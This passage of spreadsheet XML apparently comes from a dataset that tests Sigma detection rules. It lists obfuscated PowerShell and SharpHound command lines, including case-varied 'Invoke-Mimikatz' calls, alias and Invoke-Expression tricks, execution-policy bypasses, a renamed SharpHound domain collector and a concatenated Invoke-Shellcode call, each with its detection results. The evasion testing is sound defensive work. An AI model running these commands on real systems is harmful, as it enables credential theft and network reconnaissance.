      <c r="C2752" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2752" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2752" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2752" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2753" ht="15.75" customHeight="1" s="42">
      <c r="A2753" s="43" t="n"/>
      <c r="B2753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2753" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2753" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2753" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2753" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2753" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2754" ht="15.75" customHeight="1" s="42">
      <c r="A2754" s="43" t="n"/>
      <c r="B2754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2754" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2754" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2754" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2754" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2755" ht="15.75" customHeight="1" s="42">
      <c r="A2755" s="43" t="n"/>
      <c r="B2755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2755" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2755" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2755" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2755" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2756" ht="15.75" customHeight="1" s="42">
      <c r="A2756" s="43" t="n"/>
      <c r="B2756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2756" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2756" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2756" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2756" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2757" ht="15.75" customHeight="1" s="42">
      <c r="A2757" s="43" t="n"/>
      <c r="B2757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2757" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2757" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2757" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2757" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2757" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2758" ht="15.75" customHeight="1" s="42">
      <c r="A2758" s="43" t="n"/>
      <c r="B2758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2758" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2758" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2758" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I275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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2758" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2759" ht="15.75" customHeight="1" s="42">
      <c r="A2759" s="43" t="n"/>
      <c r="B2759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2759" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2759" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2759" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2759" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2760" ht="15.75" customHeight="1" s="42">
      <c r="A2760" s="43" t="n"/>
      <c r="B2760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2760" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2760" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2760" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2760" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2761" ht="15.75" customHeight="1" s="42">
      <c r="A2761" s="43" t="n"/>
      <c r="B2761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2761" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2761" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2761" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2761" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2762" ht="15.75" customHeight="1" s="42">
      <c r="A2762" s="43" t="n"/>
      <c r="B2762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2762" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2762" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2762" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2763" ht="15.75" customHeight="1" s="42">
      <c r="A2763" s="43" t="n"/>
      <c r="B2763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2763" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2763" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2763" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2764" ht="15.75" customHeight="1" s="42">
      <c r="A2764" s="43" t="n"/>
      <c r="B2764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2764" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2764" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2764" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2765" ht="15.75" customHeight="1" s="42">
      <c r="A2765" s="43" t="n"/>
      <c r="B2765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2765" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2765" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2765" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2766" ht="15.75" customHeight="1" s="42">
      <c r="A2766" s="43" t="n"/>
      <c r="B2766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2766" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2766" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2766" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2767" ht="15.75" customHeight="1" s="42">
      <c r="A2767" s="43" t="n"/>
      <c r="B2767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2767" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2767" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2767" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2767" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2768" ht="15.75" customHeight="1" s="42">
      <c r="A2768" s="43" t="n"/>
      <c r="B2768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2768" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2768" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2768" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2769" ht="15.75" customHeight="1" s="42">
      <c r="A2769" s="43" t="n"/>
      <c r="B2769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2769" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2769" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2769" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2770" ht="15.75" customHeight="1" s="42">
      <c r="A2770" s="43" t="n"/>
      <c r="B2770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2770" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2770" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2770" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I277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70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2771" ht="15.75" customHeight="1" s="42">
      <c r="A2771" s="43" t="n"/>
      <c r="B2771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2771" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2771" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2771" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2772" ht="15.75" customHeight="1" s="42">
      <c r="A2772" s="43" t="n"/>
      <c r="B2772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2772" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2772" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2772" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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772" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2772" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2773" ht="15.75" customHeight="1" s="42">
      <c r="A2773" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B2773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2773" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2773" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2773" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F2773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2773" s="43" t="n"/>
      <c r="J2773" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2773" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2774" ht="15.75" customHeight="1" s="42">
      <c r="A2774" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B2774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2774" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2774" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2774" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F2774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2774" s="44" t="n"/>
      <c r="J2774" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2774" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2775" ht="15.75" customHeight="1" s="42">
      <c r="A2775" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B2775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2775" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2775" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2775" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F2775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2775" s="43" t="n"/>
      <c r="J2775" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2775" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2776" ht="15.75" customHeight="1" s="42">
      <c r="A2776" s="43" t="n"/>
      <c r="B2776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2776" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2776" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2776" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2776" s="44" t="n"/>
      <c r="J2776" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2776" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2777" ht="15.75" customHeight="1" s="42">
      <c r="A2777" s="43" t="n"/>
      <c r="B2777" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2777" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2777" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2777" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2777" s="44" t="n"/>
      <c r="J2777" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2777" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2778" ht="15.75" customHeight="1" s="42">
      <c r="A2778" s="43" t="n"/>
      <c r="B2778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2778" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2778" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2778" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2778" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2778" s="44" t="n"/>
      <c r="J2778" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2778" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2779" ht="15.75" customHeight="1" s="42">
      <c r="A2779" s="43" t="n"/>
      <c r="B2779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2779" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2779" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2779" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2779" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I277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79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2779" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2780" ht="15.75" customHeight="1" s="42">
      <c r="A2780" s="43" t="n"/>
      <c r="B2780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2780" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2780" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2780" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278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80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2780" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2781" ht="15.75" customHeight="1" s="42">
      <c r="A2781" s="43" t="n"/>
      <c r="B2781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2781" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2781" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2781" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
